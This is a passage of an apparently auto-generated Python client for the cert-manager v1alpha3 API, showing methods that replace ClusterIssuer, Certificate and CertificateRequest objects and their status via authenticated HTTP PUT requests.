def replace_cluster_issuer(self, name, body, **kwargs): # noqa: E501
"""replace_cluster_issuer # noqa: E501
replace the specified ClusterIssuer # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.replace_cluster_issuer(name, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the ClusterIssuer (required)
:param IoCertManagerV1alpha3ClusterIssuer body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param str field_manager: fieldManager is a name associated with the actor or entity that is making these changes. The value must be less than or equal to 128 characters long, and only contain printable characters, as defined by https://golang.org/pkg/unicode/#IsPrint.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IoCertManagerV1alpha3ClusterIssuer
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.replace_cluster_issuer_with_http_info(name, body, **kwargs) # noqa: E501
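# Usage sketch: replace_cluster_issuer performs an HTTP PUT, so the API server
# expects a complete object whose metadata.resourceVersion matches the stored
# one (read-modify-write); dry_run="All" validates without persisting. The
# read_cluster_issuer call below is assumed to exist on this class and is not
# shown in this excerpt.
#
#   current = api.read_cluster_issuer("letsencrypt")
#   current.spec.acme.email = "ops@example.com"   # hypothetical field edit
#   api.replace_cluster_issuer("letsencrypt", current, dry_run="All")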
def replace_cluster_issuer_with_http_info(self, name, body, **kwargs): # noqa: E501
"""replace_cluster_issuer # noqa: E501
replace the specified ClusterIssuer # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.replace_cluster_issuer_with_http_info(name, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the ClusterIssuer (required)
:param IoCertManagerV1alpha3ClusterIssuer body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param str field_manager: fieldManager is a name associated with the actor or entity that is making these changes. The value must be less than or equal to 128 characters long, and only contain printable characters, as defined by https://golang.org/pkg/unicode/#IsPrint.
:param _return_http_data_only: return the response data only, without
the HTTP status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(IoCertManagerV1alpha3ClusterIssuer, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'name',
'body',
'pretty',
'dry_run',
'field_manager'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method replace_cluster_issuer" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'name' is set
if self.api_client.client_side_validation and ('name' not in local_var_params or # noqa: E501
local_var_params['name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `name` when calling `replace_cluster_issuer`") # noqa: E501
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `replace_cluster_issuer`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
query_params = []
if 'pretty' in local_var_params and local_var_params['pretty'] is not None: # noqa: E501
query_params.append(('pretty', local_var_params['pretty'])) # noqa: E501
if 'dry_run' in local_var_params and local_var_params['dry_run'] is not None: # noqa: E501
query_params.append(('dryRun', local_var_params['dry_run'])) # noqa: E501
if 'field_manager' in local_var_params and local_var_params['field_manager'] is not None: # noqa: E501
query_params.append(('fieldManager', local_var_params['field_manager'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/yaml']) # noqa: E501
# Authentication setting
auth_settings = ['BearerToken'] # noqa: E501
return self.api_client.call_api(
'/apis/cert-manager.io/v1alpha3/clusterissuers/{name}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IoCertManagerV1alpha3ClusterIssuer', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def replace_cluster_issuer_status(self, name, body, **kwargs): # noqa: E501
"""replace_cluster_issuer_status # noqa: E501
replace status of the specified ClusterIssuer # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.replace_cluster_issuer_status(name, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the ClusterIssuer (required)
:param IoCertManagerV1alpha3ClusterIssuer body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param str field_manager: fieldManager is a name associated with the actor or entity that is making these changes. The value must be less than or equal to 128 characters long, and only contain printable characters, as defined by https://golang.org/pkg/unicode/#IsPrint.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IoCertManagerV1alpha3ClusterIssuer
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.replace_cluster_issuer_status_with_http_info(name, body, **kwargs) # noqa: E501
def replace_cluster_issuer_status_with_http_info(self, name, body, **kwargs): # noqa: E501
"""replace_cluster_issuer_status # noqa: E501
replace status of the specified ClusterIssuer # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.replace_cluster_issuer_status_with_http_info(name, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the ClusterIssuer (required)
:param IoCertManagerV1alpha3ClusterIssuer body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param str field_manager: fieldManager is a name associated with the actor or entity that is making these changes. The value must be less than or equal to 128 characters long, and only contain printable characters, as defined by https://golang.org/pkg/unicode/#IsPrint.
:param _return_http_data_only: return the response data only, without
the HTTP status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(IoCertManagerV1alpha3ClusterIssuer, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'name',
'body',
'pretty',
'dry_run',
'field_manager'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method replace_cluster_issuer_status" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'name' is set
if self.api_client.client_side_validation and ('name' not in local_var_params or # noqa: E501
local_var_params['name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `name` when calling `replace_cluster_issuer_status`") # noqa: E501
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `replace_cluster_issuer_status`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
query_params = []
if 'pretty' in local_var_params and local_var_params['pretty'] is not None: # noqa: E501
query_params.append(('pretty', local_var_params['pretty'])) # noqa: E501
if 'dry_run' in local_var_params and local_var_params['dry_run'] is not None: # noqa: E501
query_params.append(('dryRun', local_var_params['dry_run'])) # noqa: E501
if 'field_manager' in local_var_params and local_var_params['field_manager'] is not None: # noqa: E501
query_params.append(('fieldManager', local_var_params['field_manager'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/yaml']) # noqa: E501
# Authentication setting
auth_settings = ['BearerToken'] # noqa: E501
return self.api_client.call_api(
'/apis/cert-manager.io/v1alpha3/clusterissuers/{name}/status', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IoCertManagerV1alpha3ClusterIssuer', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def replace_namespaced_certificate(self, name, namespace, body, **kwargs): # noqa: E501
"""replace_namespaced_certificate # noqa: E501
replace the specified Certificate # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.replace_namespaced_certificate(name, namespace, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the Certificate (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param IoCertManagerV1alpha3Certificate body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param str field_manager: fieldManager is a name associated with the actor or entity that is making these changes. The value must be less than or equal to 128 characters long, and only contain printable characters, as defined by https://golang.org/pkg/unicode/#IsPrint.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IoCertManagerV1alpha3Certificate
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.replace_namespaced_certificate_with_http_info(name, namespace, body, **kwargs) # noqa: E501
def replace_namespaced_certificate_with_http_info(self, name, namespace, body, **kwargs): # noqa: E501
"""replace_namespaced_certificate # noqa: E501
replace the specified Certificate # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.replace_namespaced_certificate_with_http_info(name, namespace, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the Certificate (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param IoCertManagerV1alpha3Certificate body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param str field_manager: fieldManager is a name associated with the actor or entity that is making these changes. The value must be less than or equal to 128 characters long, and only contain printable characters, as defined by https://golang.org/pkg/unicode/#IsPrint.
:param _return_http_data_only: return the response data only, without
the HTTP status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(IoCertManagerV1alpha3Certificate, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'name',
'namespace',
'body',
'pretty',
'dry_run',
'field_manager'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method replace_namespaced_certificate" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'name' is set
if self.api_client.client_side_validation and ('name' not in local_var_params or # noqa: E501
local_var_params['name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `name` when calling `replace_namespaced_certificate`") # noqa: E501
# verify the required parameter 'namespace' is set
if self.api_client.client_side_validation and ('namespace' not in local_var_params or # noqa: E501
local_var_params['namespace'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `namespace` when calling `replace_namespaced_certificate`") # noqa: E501
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `replace_namespaced_certificate`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
if 'namespace' in local_var_params:
path_params['namespace'] = local_var_params['namespace'] # noqa: E501
query_params = []
if 'pretty' in local_var_params and local_var_params['pretty'] is not None: # noqa: E501
query_params.append(('pretty', local_var_params['pretty'])) # noqa: E501
if 'dry_run' in local_var_params and local_var_params['dry_run'] is not None: # noqa: E501
query_params.append(('dryRun', local_var_params['dry_run'])) # noqa: E501
if 'field_manager' in local_var_params and local_var_params['field_manager'] is not None: # noqa: E501
query_params.append(('fieldManager', local_var_params['field_manager'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/yaml']) # noqa: E501
# Authentication setting
auth_settings = ['BearerToken'] # noqa: E501
return self.api_client.call_api(
'/apis/cert-manager.io/v1alpha3/namespaces/{namespace}/certificates/{name}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IoCertManagerV1alpha3Certificate', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def replace_namespaced_certificate_request(self, name, namespace, body, **kwargs): # noqa: E501
"""replace_namespaced_certificate_request # noqa: E501
replace the specified CertificateRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.replace_namespaced_certificate_request(name, namespace, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the CertificateRequest (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param IoCertManagerV1alpha3CertificateRequest body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param str field_manager: fieldManager is a name associated with the actor or entity that is making these changes. The value must be less than or equal to 128 characters long, and only contain printable characters, as defined by https://golang.org/pkg/unicode/#IsPrint.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IoCertManagerV1alpha3CertificateRequest
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.replace_namespaced_certificate_request_with_http_info(name, namespace, body, **kwargs) # noqa: E501
def replace_namespaced_certificate_request_with_http_info(self, name, namespace, body, **kwargs): # noqa: E501
"""replace_namespaced_certificate_request # noqa: E501
replace the specified CertificateRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.replace_namespaced_certificate_request_with_http_info(name, namespace, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the CertificateRequest (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param IoCertManagerV1alpha3CertificateRequest body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param str field_manager: fieldManager is a name associated with the actor or entity that is making these changes. The value must be less than or equal to 128 characters long, and only contain printable characters, as defined by https://golang.org/pkg/unicode/#IsPrint.
:param _return_http_data_only: return the response data only, without
the HTTP status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(IoCertManagerV1alpha3CertificateRequest, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'name',
'namespace',
'body',
'pretty',
'dry_run',
'field_manager'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method replace_namespaced_certificate_request" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'name' is set
if self.api_client.client_side_validation and ('name' not in local_var_params or # noqa: E501
local_var_params['name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `name` when calling `replace_namespaced_certificate_request`") # noqa: E501
# verify the required parameter 'namespace' is set
if self.api_client.client_side_validation and ('namespace' not in local_var_params or # noqa: E501
local_var_params['namespace'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `namespace` when calling `replace_namespaced_certificate_request`") # noqa: E501
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `replace_namespaced_certificate_request`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
if 'namespace' in local_var_params:
path_params['namespace'] = local_var_params['namespace'] # noqa: E501
query_params = []
if 'pretty' in local_var_params and local_var_params['pretty'] is not None: # noqa: E501
query_params.append(('pretty', local_var_params['pretty'])) # noqa: E501
if 'dry_run' in local_var_params and local_var_params['dry_run'] is not None: # noqa: E501
query_params.append(('dryRun', local_var_params['dry_run'])) # noqa: E501
if 'field_manager' in local_var_params and local_var_params['field_manager'] is not None: # noqa: E501
query_params.append(('fieldManager', local_var_params['field_manager'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/yaml']) # noqa: E501
# Authentication setting
auth_settings = ['BearerToken'] # noqa: E501
return self.api_client.call_api(
'/apis/cert-manager.io/v1alpha3/namespaces/{namespace}/certificaterequests/{name}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IoCertManagerV1alpha3CertificateRequest', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def replace_namespaced_certificate_request_status(self, name, namespace, body, **kwargs): # noqa: E501
"""replace_namespaced_certificate_request_status # noqa: E501
replace status of the specified CertificateRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.replace_namespaced_certificate_request_status(name, namespace, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the CertificateRequest (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param IoCertManagerV1alpha3CertificateRequest body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param str field_manager: fieldManager is a name associated with the actor or entity that is making these changes. The value must be less than or equal to 128 characters long, and only contain printable characters, as defined by https://golang.org/pkg/unicode/#IsPrint.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IoCertManagerV1alpha3CertificateRequest
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.replace_namespaced_certificate_request_status_with_http_info(name, namespace, body, **kwargs) # noqa: E501
def replace_namespaced_certificate_request_status_with_http_info(self, name, namespace, body, **kwargs): # noqa: E501
"""replace_namespaced_certificate_request_status # noqa: E501
replace status of the specified CertificateRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.replace_namespaced_certificate_request_status_with_http_info(name, namespace, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the CertificateRequest (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param IoCertManagerV1alpha3CertificateRequest body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param str field_manager: fieldManager is a name associated with the actor or entity that is making these changes. The value must be less than or equal to 128 characters long, and only contain printable characters, as defined by https://golang.org/pkg/unicode/#IsPrint.
:param _return_http_data_only: return the response data only, without
the HTTP status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(IoCertManagerV1alpha3CertificateRequest, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'name',
'namespace',
'body',
'pretty',
'dry_run',
'field_manager'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method replace_namespaced_certificate_request_status" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'name' is set
if self.api_client.client_side_validation and ('name' not in local_var_params or # noqa: E501
local_var_params['name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `name` when calling `replace_namespaced_certificate_request_status`") # noqa: E501
# verify the required parameter 'namespace' is set
if self.api_client.client_side_validation and ('namespace' not in local_var_params or # noqa: E501
local_var_params['namespace'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `namespace` when calling `replace_namespaced_certificate_request_status`") # noqa: E501
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `replace_namespaced_certificate_request_status`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
if 'namespace' in local_var_params:
path_params['namespace'] = local_var_params['namespace'] # noqa: E501
query_params = []
if 'pretty' in local_var_params and local_var_params['pretty'] is not None: # noqa: E501
query_params.append(('pretty', local_var_params['pretty'])) # noqa: E501
if 'dry_run' in local_var_params and local_var_params['dry_run'] is not None: # noqa: E501
query_params.append(('dryRun', local_var_params['dry_run'])) # noqa: E501
if 'field_manager' in local_var_params and local_var_params['field_manager'] is not None: # noqa: E501
query_params.append(('fieldManager', local_var_params['field_manager'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/yaml']) # noqa: E501
# Authentication setting
auth_settings = ['BearerToken'] # noqa: E501
return self.api_client.call_api(
'/apis/cert-manager.io/v1alpha3/namespaces/{namespace}/certificaterequests/{name}/status', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IoCertManagerV1alpha3CertificateRequest', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def replace_namespaced_certificate_status(self, name, namespace, body, **kwargs): # noqa: E501
"""replace_namespaced_certificate_status # noqa: E501
replace status of the specified Certificate # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.replace_namespaced_certificate_status(name, namespace, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the Certificate (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param IoCertManagerV1alpha3Certificate body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param str field_manager: fieldManager is a name associated with the actor or entity that is making these changes. The value must be less than or equal to 128 characters long, and only contain printable characters, as defined by https://golang.org/pkg/unicode/#IsPrint.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IoCertManagerV1alpha3Certificate
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.replace_namespaced_certificate_status_with_http_info(name, namespace, body, **kwargs) # noqa: E501
def replace_namespaced_certificate_status_with_http_info(self, name, namespace, body, **kwargs): # noqa: E501
"""replace_namespaced_certificate_status # noqa: E501
replace status of the specified Certificate # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.replace_namespaced_certificate_status_with_http_info(name, namespace, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the Certificate (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param IoCertManagerV1alpha3Certificate body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param str field_manager: fieldManager is a name associated with the actor or entity that is making these changes. The value must be less than or equal to 128 characters long, and only contain printable characters, as defined by https://golang.org/pkg/unicode/#IsPrint.
:param _return_http_data_only: return the response data only, without
the HTTP status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(IoCertManagerV1alpha3Certificate, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'name',
'namespace',
'body',
'pretty',
'dry_run',
'field_manager'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method replace_namespaced_certificate_status" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'name' is set
if self.api_client.client_side_validation and ('name' not in local_var_params or # noqa: E501
local_var_params['name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `name` when calling `replace_namespaced_certificate_status`") # noqa: E501
# verify the required parameter 'namespace' is set
if self.api_client.client_side_validation and ('namespace' not in local_var_params or # noqa: E501
local_var_params['namespace'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `namespace` when calling `replace_namespaced_certificate_status`") # noqa: E501
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `replace_namespaced_certificate_status`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in local_var_params:
